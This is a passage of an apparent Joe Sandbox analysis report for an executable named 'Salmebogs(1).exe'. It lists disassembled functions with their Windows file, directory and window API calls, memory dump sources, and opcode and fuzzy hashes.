                                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,004032E6,00000009), ref: 00406419
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406434
                                                                          • Part of subcall function 00406397: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063AE
                                                                          • Part of subcall function 00406397: wsprintfW.USER32 ref: 004063E9
                                                                          • Part of subcall function 00406397: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004063FD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                        • String ID:
                                                                        • API String ID: 2547128583-0
                                                                        • Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                        • Instruction ID: e585cff6f5786af6166c4577b0086b93443bcdd3738d69eb1d3bc5833b741c46
                                                                        • Opcode Fuzzy Hash: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                        • Instruction Fuzzy Hash: 40E08C32604220AAD2119B749E8493B66A8AE99740302043FF946F2080DB78EC329AAD
                                                                        Function 00405C02 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00000003,00402E2E,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405C06
                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405C28
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate
                                                                        • String ID:
                                                                        • API String ID: 415043291-0
                                                                        • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                        • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                        • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                        • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                        Function 00405BDD Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,?,004057E2,?,?,00000000,004059B8,?,?,?,?), ref: 00405BE2
                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405BF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                        • Instruction ID: 8fdcebde4214434899a3f1b003f07ebd3e102d67d4793912b01b2ec481300f1c
                                                                        • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                        • Instruction Fuzzy Hash: 22D0C972904520ABC2102728AE0889BBF65EB542717024B35FAA9A22B0CB304C569A98
                                                                        Function 004056D8 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403270,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 004056DE
                                                                        • GetLastError.KERNEL32 ref: 004056EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectoryErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1375471231-0
                                                                        • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                        • Instruction ID: b0cc9022c7fc522e2a1325a3a88c93622829811feb2dde411d36191549599a95
                                                                        • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                        • Instruction Fuzzy Hash: B3C04C70615602DAE6105B20DE1971B7954AB50741F51883A614AE11A0DA758455DE2E
                                                                        Function 00405C85 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403232,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405C99
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                        • Instruction ID: 1f5957c0360fd8fa5667ae66c631dc737c687ff57a2230ad484cb91cc4d73fb5
                                                                        • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                        • Instruction Fuzzy Hash: E7E08C3220421AABEF109E618C00AEB7B6CEF05364F004436F922E2140E234E8218BA8
                                                                        Function 00405CB4 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031E8,00000000,0078B6D8,000000FF,0078B6D8,000000FF,000000FF,00000004,00000000), ref: 00405CC8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                        • Instruction ID: 98013b39db6e85760f5ab21dfedcc60362cbd5470676cd53f11b5d229ee65248
                                                                        • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                        • Instruction Fuzzy Hash: A0E0463221425AABEF109E508C00AAB3B6CEB00261F104432B915E6040E630E961ABA8
                                                                        Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: e1995a9e833a58539b7e44c60ab8e2d08775019d7d80c7276fb4523c6d485d87
                                                                        • Instruction ID: 204b984327d7f3e6c4152ed8a6035fe7395a45412b5aca2fcc5e3a71fd3ba684
                                                                        • Opcode Fuzzy Hash: e1995a9e833a58539b7e44c60ab8e2d08775019d7d80c7276fb4523c6d485d87
                                                                        • Instruction Fuzzy Hash: B7D05B33704100DBCB10DFE89E0869D77759B80334B20C177D501F25D4D6B8C5505B1D
                                                                        Function 0040413D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040414F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 4f7e142c0b73324572861e51e4895595a613045da2a956c59d23be962e06f5a1
                                                                        • Instruction ID: e107f78b1bc9bc3d7278e4c5f459ebf6569cc91abc8b2cca8897f7623fe5a1fb
                                                                        • Opcode Fuzzy Hash: 4f7e142c0b73324572861e51e4895595a613045da2a956c59d23be962e06f5a1
                                                                        • Instruction Fuzzy Hash: 97C09BB1744701BBDB109B509D4DF17775D6794700F1584297350F61D4D674E450D61D
                                                                        Function 00404126 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000028,?,00000001,00403F52), ref: 00404134
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 12b0ae2962ef85dd80a6f14f68689ea05a74157d7519edd7707daa867acccfd2
                                                                        • Instruction ID: 6c025a846befaa099d481c36b27a79c5fc7dd1f0b3caa6cf802aff4301849ee4
                                                                        • Opcode Fuzzy Hash: 12b0ae2962ef85dd80a6f14f68689ea05a74157d7519edd7707daa867acccfd2
                                                                        • Instruction Fuzzy Hash: 02B09236190A00BADA614B00EE09F457A62A7AC701F00C429B240240B0CAB200A0DB09
                                                                        Function 00403235 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00403243
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                        • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                                        • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                        • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                                        Function 00404113 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,00403EEB), ref: 0040411D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
